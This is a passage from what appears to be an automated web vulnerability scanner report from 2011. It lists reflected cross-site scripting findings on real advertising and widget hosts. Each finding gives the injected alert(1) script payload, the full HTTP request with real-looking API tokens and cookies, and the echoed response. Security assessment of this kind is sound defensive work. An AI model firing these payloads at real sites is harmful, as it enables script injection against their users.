Referer: http://tag.admeld.com/ad/iframe/489/urbanbaby/300x250/urbanbaby_atf?t=1303947447595&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143628017.1303947448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143628017.1934352856.1303947448.1303947448.1303947448.1; __utmc=143628017; __utmb=143628017.1.10.1303947448; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:08 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 27 Apr 2011 23:41:08 GMT
Content-Length: 1331


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a>80c830b7af4" _REQ_NUM="0" -->
...[SNIP]...

3.671. http://mads.urbanbaby.com/mac-ad [beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the beacon request parameter is copied into the HTML document as plain text between tags. The payload a91fe<a>03426aa424e was submitted in the beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?beacon=1a91fe<a>03426aa424e&site=101&NCAT=1:13985&ptype=2001 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://www.urbanbaby.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:43 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 27 Apr 2011 23:39:43 GMT
Content-Length: 351

<!-- MAC-AD STATUS: INCORRECT BEACON='19103426424' SPECIFIED. BEACON CALL
...[SNIP]...

3.672. http://mads.urbanbaby.com/mac-ad [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.urbanbaby.com
Path:	/mac-ad

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload 1e31d<a>6c874a55331 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?beacon=1&site=1011e31d<a>6c874a55331&NCAT=1:13985&ptype=2001 HTTP/1.1
Host: mads.urbanbaby.com
Proxy-Connection: keep-alive
Referer: http://www.urbanbaby.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:05 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 27 Apr 2011 23:40:05 GMT
Content-Length: 390

<!-- MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='101131687455331' PTYP
...[SNIP]...

3.673. http://nmp.newsgator.com/NGBuzz//buzz.ashx [_dsrId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmp.newsgator.com
Path:	/NGBuzz//buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload e36fa<script>alert(1)</script>7142d7a7938 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz//buzz.ashx?buzzId=BURLINGTON%20PLATTSBURGH&apiToken=18E45DF08C414168B99ADDF208CBBAFE&load=data&maxPosts=5&_dsrId=data_BURLINGTON%20PLATTSBURGHe36fa<script>alert(1)</script>7142d7a7938 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Wed, 27 Apr 2011 22:58:30 GMT
ETag: 634395203103481600
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=300
Date: Wed, 27 Apr 2011 23:18:03 GMT
Connection: close
Content-Length: 4660

window.ng_scriptload({id:'data_BURLINGTON PLATTSBURGHe36fa<script>alert(1)</script>7142d7a7938',status:200,statusText:'200 OK',response:{Data:[{Description:'Burlington police are investigating the theft of meat and other food sometime late Tuesday or early Wednesday morning from two outdoor ref
...[SNIP]...

3.674. http://nmp.newsgator.com/NGBuzz//gateway.ashx/ngdsr/ [_dsrId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmp.newsgator.com
Path:	/NGBuzz//gateway.ashx/ngdsr/

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 1d6c5<script>alert(1)</script>fb2d7aaa198 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz//gateway.ashx/ngdsr/?buzzId=187594&apiToken=18E45DF08C414168B99ADDF208CBBAFE&C_=NGBuzz.Classes.BuzzAPI%2CNGBuzz&M_=LookupDMA&zipCode=05672&_dsrId=zip_056721d6c5<script>alert(1)</script>fb2d7aaa198 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=600
Expires: Wed, 27 Apr 2011 23:27:58 GMT
Date: Wed, 27 Apr 2011 23:17:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 222

window.ng_scriptload({"id":'zip_056721d6c5<script>alert(1)</script>fb2d7aaa198',
"status":200,
"statusText":"OK",
"response":{"error":"","result":{"ZipCode":5672,"DMAName":"BURLINGTON-PLATTSBURGH","City":"","State":""}}});

3.675. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmp.newsgator.com
Path:	/NGBuzz/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload c35f2<script>alert(1)</script>468926ccf29 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&zip=05672&apiToken=18E45DF08C414168B99ADDF208CBBAFE&buzzId=187594&_dsrId=ngbuzz_187594_datac35f2<script>alert(1)</script>468926ccf29 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3.676. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmp.newsgator.com
Path:	/NGBuzz/buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload 34cf9<script>alert(1)</script>4a55a4013c4 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&zip=05672&apiToken=18E45DF08C414168B99ADDF208CBBAFE&buzzId=18759434cf9<script>alert(1)</script>4a55a4013c4&_dsrId=ngbuzz_187594_data HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=600
Date: Wed, 27 Apr 2011 23:17:55 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 192

window.ng_scriptload({id:'ngbuzz_187594_data',status:404,statusText:'BuzzId not found',response:{message:'Could not find Buzz item with id: 18759434cf9<script>alert(1)</script>4a55a4013c4'}});

3.677. http://nmp.newsgator.com/ngbuzz//buzz.ashx [buzzId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmp.newsgator.com
Path:	/ngbuzz//buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload a4586<script>alert(1)</script>52d0059fe5d was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ngbuzz//buzz.ashx?zip=05672&buzzId=187594a4586<script>alert(1)</script>52d0059fe5d&apiToken=18E45DF08C414168B99ADDF208CBBAFE&load=LoadBuzz&_dsrId=ngLoadBuzzSettings_187594 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=600
Date: Wed, 27 Apr 2011 23:17:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 199

window.ng_scriptload({id:'ngLoadBuzzSettings_187594',status:404,statusText:'BuzzId not found',response:{message:'Could not find Buzz item with id: 187594a4586<script>alert(1)</script>52d0059fe5d'}});

3.678. http://nmp.newsgator.com/ngbuzz//buzz.ashx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmp.newsgator.com
Path:	/ngbuzz//buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e0cd3%3balert(1)//62f0eb02a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0cd3;alert(1)//62f0eb02a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ngbuzz//buzz.ashx?zip=05672&buzzId=187594&apiToken=18E45DF08C414168B99ADDF208CBBAFE&load=LoadBuzz&_dsrId=ngLoadBuzzSettings_187594&e0cd3%3balert(1)//62f0eb02a98=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT
ETag: 634320802451966061
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=600
Date: Wed, 27 Apr 2011 23:17:58 GMT
Connection: close
Content-Length: 3050

try{var buzzStyles_187594="";}catch(e){}

var buzzScript_187594 = "";

try{var buzzTemplate_187594="\n<div id=\"ngWidgetBox_${BuzzId}\" class=\"ng_buzzCont
...[SNIP]...
6-2'},orgCode:'CBSLN',apiToken:'18E45DF08C414168B99ADDF208CBBAFE',name:'Zip Code Widget',buzzAppUrl:'http://nmp.newsgator.com/NGBuzz/',buzzId:187594,directUrl:'http://hosted.newsgator.com/',extraArgs:{e0cd3;alert(1)//62f0eb02a98:'1',zip:'05672'},targetId:null}});

3.679. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://offers-service.cbsinteractive.com
Path:	/offers/script.sc

Issue detail

The value of the offerId request parameter is copied into the HTML document as plain text between tags. The payload 80300<script>alert(1)</script>e36b2ec5e7e was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/script.sc?offerId=7880300<script>alert(1)</script>e36b2ec5e7e HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/apple-ipad/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=90898760.1303940884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90898760.1302257195.1303940884.1303940884.1303940884.1; __utmc=90898760; __utmb=90898760.1.10.1303940884

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 88
Date: Wed, 27 Apr 2011 21:58:17 GMT

// Offer id 7880300<script>alert(1)</script>e36b2ec5e7e does not exists or is not ACTIVE

3.680. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 281ed'%3balert(1)//399bbcb6f8b was submitted in the admeld_callback parameter. This input was echoed as 281ed';alert(1)//399bbcb6f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match281ed'%3balert(1)//399bbcb6f8b HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf?t=1303946102032&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fnews.cnet.com%2F8301-30686_3-20057815-266.html%3Ftag%3DtopStories1&refer=http%3A%2F%2Fnews.cnet.com%2F%3Ftag%3Dhdr%3Bbrandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuZYEMzFzHE0h4uLY889RoF5y16/ZQEKTDcGEo0RXCwcB7sZgcxzOUBmZwczkHkaxNyxCyQ6UQVI/AsH8pv+MwHJQ0dAZDOYfXEvE9DMV73MAtOmfgeaycKxdj8jAHC+Hps="; partnerUID=eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjg0IjogWyJRNHpndm5Xczk5OXJUU2hCIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 27 Apr 2011 23:14:57 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 27-Apr-2011 23:14:37 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 373

document.write('<img width="0" height="0" src="http://tag.admeld.com/match281ed';alert(1)//399bbcb6f8b?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304378097&custom_user_segments=%2C10656%2C11265%2C49026%2C49027%2C13893%2C17857%2C50185%2C50922%2C13899%2C415
...[SNIP]...

3.681. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c937"><script>alert(1)</script>8de8a8010a was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=8c937"><script>alert(1)</script>8de8a8010a&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf?t=1303946102032&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fnews.cnet.com%2F8301-30686_3-20057815-266.html%3Ftag%3DtopStories1&refer=http%3A%2F%2Fnews.cnet.com%2F%3Ftag%3Dhdr%3Bbrandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=RNJ9hNp_Ytke4K3_MLDetaBZCzjPRhryFEOqult4msa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20HK8hNK5y4spsdBx22_Atqh4yf7gWdRyY4nO--zz6sln7A3_z4NlZPxFoPt3Uw_aRVSN0m2klEeTW1KA1di8OAYXXVxlTgh_voK6emDWdftgO-nut4CNoTli9hKdQgGGL_ArFbsMU7SM_RHjy_6zjGAVdA-aRZXmNDP7lSI2wQSG_ZkBdgJgIHJ_0GD9hEAnNu6lhUpb2IzujoXnFpxd00nfu4977TrZ8GHyhed93dEHYQYHOHaF4abG8I094dduCWyYLZMG4wQKFopdYuz1yBkrjocbhf_en5ky2Zgm3rpe_TLLYkm6ow_hSldLzYIRQzPkiGLTlQAB-AyRlZy8hNM5CZdwH63dX586rlVt-rm7T5lk3rNTcwPq3Nv0aBcfX_WCWnBzCQuIbOVa7F8E-DsQQ0XtSgyP9-pRtjKBA9Cw6KpKCQRV_nuo9XTdqfcEuFjw1q3jr96MmE73EdnErm3vwl2KfkvqpOe3sJLkGJnPxWaM37S_qVbKjiLc0d7HG2j37arSozuBgqeZjp8etrKP0MMPHRCJQircGmeFefpToKqMVJJLJFDSB1wQojnNFLZVi-KxNkQ_VJiUnD6sFTZsgkWZhbwRXzuNDStWlCtyOUwHwhiIhI6vYlDAmBKnXtBmdLEA3K48MCNCNawEQzJsDf_Pg2Vk_EWg-3dTD9pFR_es5qV3056KPq2rUT5zBRTUUfVyhkIRasPswtxI7iKl7s6FAXEc8n5El2XcbrTucHE0v-tlwP1vZz1VQYwdIxV0D5pFleY0M_uVIjbBBIbBawJhlLv8g8ldsI-35kGCJVwRl8sycZ0PAtWrVTViuFYrui1COy2KOTpvlid1x6YDCy0LXBHUGgi2TaPtaYUWrJgtkwbjBAoWil1i7PXIGSp-mVft7M-LblYrLgbicDRcQIWfivnSOLEVf1fvaJ0LD4GOmXn-MdBpj5v6mUeKpEu_qA1v2JfEexKn5Jue0cnG6zc79hiM8lP3DRxPQPRgI0_xuWp1g1tkjZsLrAdv1550JC_L7GVNyA8GmhInk0modn5i3E9PsY1OXjKV8iYCdqOsFLtLW59aQLrs4R_Sm6HRv-fT0qZpcVwrwAMPoWw2SuEzmZPy7Pr3B2CT3i7f8WgzvsrFMQFtFLJosfmmwkcBIXiYC5KD6oiDkyhrBnCDrTceeWmOo3AglxIXXfIZd248k5q7u-e5MH_3Xle2fFdIDPTok26GX0-9FGi9EqsKDQR55l7woSi_1v5QjXhRriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iRF7ehMgm_ROAJYmpIw1CyVHCx4Lh6UpiYYG1o8vcl5mQP9VGVJnredzylZiYSDC8VOJU0K6xTdplSIqaWyjrlo4KhxO6BPAp6mtQbed5gA0Cjgnp6Rw5lmAsU07N51K5j3PZSzxrE9kN_uZFovGfORhH6MoH1n1mLx2USSZv2x8_HGESPaIScxefiiPNK0OCUG5MdnRQlgwUbxU_0BtXy0yd8WW2V42t-IFhBe9yaSFw1_tpW4L2632z_PWw-s3g_lGgo6LZg0d3xlBa7ocQft3sG2mMmWuyyqIdPSqtxjRklIlnrGECTG2lMEZCOsAdkiEkwcNQoFjB6uEJlwUgsEKF4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA72ly1dOLu1ZkDcoAF8YeGRX_lq7jZ32JrugGCjUIuqMkyLoTQYaIc9uW48ZcNu2ciILtP-yK1JywsvYFiqMlV9gHJ2EXSlkdHYPQHM9nqB2E7HqGtyuc3OfzTlki21Iked0l5Ymb2bmtH2iyNubJGsSKw_zqF-QjnG4_NexZYaYWdSdJxVooCOghLFZBKn_0EQO2vAre22F8lnSmyeDcza7YGogWldkaT1u5x3E36xXrNS7o-uQk9nl956dFM0clLfmZEZSVy6Y-xcSL0nyDvBegaxMxUkPFg2MrXe2Tu6RZYK_eJ83sbVbZgk4Mm2xjvgW7-OS05wcvyGHBsJw9q1CYZ-KKGVDzHPl9zlz7CulV5IVqtOgzxHZaVHOIdEQIOjCbv6Ls4W-7l6hZieh5H5pfJvz0_xp0u9Sr3Ow-0lehezJJr2l8tby08-BywuvZFxyM4somZiu5xkNZQ15_U6Rpo-UcV-kqgda3I_RK6XB_G-nPmaE7wHqMJQ3-EmxOFvfzd5YD06fPVNZ1LTBZN4ocL1Rk_SlsYqw7IlYjuWqlv4egixt5B17GL1Jx5afmr; fc=S44WeTE_hcsignE6AFtjxTFBxEpH-UBt3Uc78oaz-ks4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtkVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; rv=1; 